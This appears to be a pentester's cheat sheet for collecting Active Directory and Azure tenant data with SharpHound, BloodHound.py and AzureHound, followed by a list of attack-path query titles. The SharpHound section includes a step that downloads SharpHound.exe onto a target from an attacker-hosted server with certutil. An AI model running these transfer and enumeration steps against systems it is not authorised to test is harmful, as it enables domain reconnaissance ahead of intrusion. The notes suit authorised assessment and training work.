BloodHound
BloodHound
- install and run neo4j
- start bloodhound gui
SharpHound.ps1
- source: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName azdump.zip
# wait, be patient
SharpHound
install
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip -O /opt/windows/SharpHound.zip
unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound
rm /opt/windows/SharpHound.zip
mkdir -p /home/kali/workspace/www & cd /home/kali/workspace/www
cp /opt/windows/sharpHound/SharpHound.exe .
python3 -m http.server 80
certutil -urlcache -f http://192.168.45.226/SharpHound.exe SharpHound.exe
wget http://192.168.45.226/SharpHound.exe -O SharpHound.exe
BloodHound.py
BloodHound.py is a Python based ingestor for BloodHound, based on Impacket.
echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
mv BloodHound.py-1.0.1 bloodHoundPy
rm /opt/windows/bloodHoundPy.zip
/opt/windows/bloodHoundPy/bloodhound.py -u 'admin' -p 'xxxxxxxxxx' -ns '172.16.5.5' -d 'e-corp.com' -c all
AzureHound
install
echo "==========> Windows:AzureHound"
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip
unzip /opt/windows/Azurehound.zip -d /opt/windows
rm /opt/windows/Azurehound.zip
/opt/windows/azurehound -u "admin@e-corp.com" -p "xxxxxxxxxx" list --tenant "e-corp.com" -o all.json
export USER='admin@e-corp.com'
export PASS='xxxxxxxxxxxxxxxx'
export TENA='e-corp.com'
|-<
echo $USER
echo $PASS
echo $TENA
|-<
/opt/windows/azurehound --help
/opt/windows/azurehound list --help
/opt/windows/azurehound -u $USER -p $PASS list tenants --tenant $TENA -o tenants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list users --tenant $TENA -o users.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list groups --tenant $TENA -o groups.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list group-owners --tenant $TENA -o group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list group-members --tenant $TENA -o group-members.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-descendants --tenant $TENA -o management-group-descendants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-owners --tenant $TENA -o management-group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-role-assignments --tenant $TENA -o management-group-role-assignments.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-user-access-admins --tenant $TENA -o management-group-user-access-admins.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-groups --tenant $TENA -o management-groups.json
/opt/windows/azurehound -u $USER -p $PASS list roles --tenant $TENA -o roles.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list role-assignments --tenant $TENA -o role-assignments.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list devices --tenant $TENA -o devices.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list device-owners --tenant $TENA -o device-owners.json -v 1
Analytics Queries
List all Kerberoastable Accounts
Find user that doesn’t require kerberos pre-authentication (aka AS-REP Roasting)
Find servers a user can RDP into.
match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' AND c.operatingsystem CONTAINS 'Server' return p
Find all sessions any user in a specific domain has
View all groups that contain the word ‘admin’
View all users that contain the word ‘admin’
View all computers